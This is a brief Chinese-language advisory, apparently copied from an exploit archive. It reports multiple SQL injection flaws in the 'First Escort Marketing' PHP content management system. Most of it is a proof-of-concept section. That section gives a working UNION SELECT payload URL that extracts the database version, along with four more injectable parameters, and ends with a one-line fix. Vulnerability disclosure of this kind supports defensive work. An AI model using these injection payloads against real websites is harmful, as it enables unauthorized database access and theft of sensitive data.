First Escort Marketing是一款商业的内容管理系统,First Escort Marketing中的多个文件存在SQL注入漏洞,可能导致敏感信息泄露。
[+]info: ~~~~~~~~~ First Escort Marketing CMS Multiple SQL Injection # Platform: php # Date: 18.04.2011 # Author: NoNameMT # Software Link: html">http://www.first-escort-marketing.co.uk/agencies.html # Price: 599 £ # Tested on: Windows 7 # Mail: [email protected] # Homepage: http://nonamemt.us
[+]poc: ~~~~~~~~~ http://www.2cto.com/escort_agency/banner.php?categoryID=-2+union+select+1,version(),3,4,5,6,7--+ http://www.2cto.com/escort_agency/escort-profile.php?modelid=13[Blind-SQL] http://www.2cto.com/escort_agency/write_review.php?modelid=13[SQL] http://www.2cto.com/escort_agency/booking-form.php?modelid=13[SQL] http://www.2cto.com/escort_agency/gallery_escorts.php?gallery_id=13[SQL]
修复:过滤漏洞页面
|